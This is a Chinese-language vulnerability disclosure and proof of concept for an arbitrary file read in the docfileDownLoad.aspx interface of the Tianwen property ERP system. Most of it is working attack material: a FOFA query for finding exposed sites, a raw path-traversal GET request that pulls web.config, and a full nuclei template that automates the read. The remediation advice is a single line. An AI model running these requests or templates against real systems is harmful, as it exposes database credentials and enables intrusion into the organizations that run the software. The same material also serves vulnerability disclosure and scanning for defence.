天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞

漏洞描述

天问物业ERP系统培训是用友旗下畅捷通公司推出的一项重要服务，旨在帮助物业管某理业提升管理效率和水平。天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞

产品界面

fofa语法

body="天问物业ERP系统" || body="国家版权局软著登字第1205328号" || body="/HM/M_Main/frame/sso.aspx"

POC

GET /HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

nuclei验证

id: tianwen-ERP-docfileDownLoad-fileread
info:
  name: 天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞
  author: nobody
  severity: high
  description: |
    天问物业ERP系统培训是用友旗下畅捷通公司推出的一项重要服务，旨在帮助物业管某理业提升管理效率和水平。天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞
  impact: |
    攻击者可以通过该接口读取文件，获取数据库账号密码等敏感信息
  remediation: |
    升级版本，打补丁
  metadata:
    verified: true
    max-request: 3
    fofa-query: body="天问物业ERP系统" || body="国家版权局软著登字第1205328号" || body="/HM/M_Main/frame/sso.aspx"
  tags: fileread
requests:
  - raw:
      - |
        GET /HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
        Accept: */*
        Connection: Keep-Alive
    matchers:
      - type: dsl
        dsl:
          - status_code == 200 && contains_all(body,"<?xml","system.web")

修复建议

• 建议升级到最新版本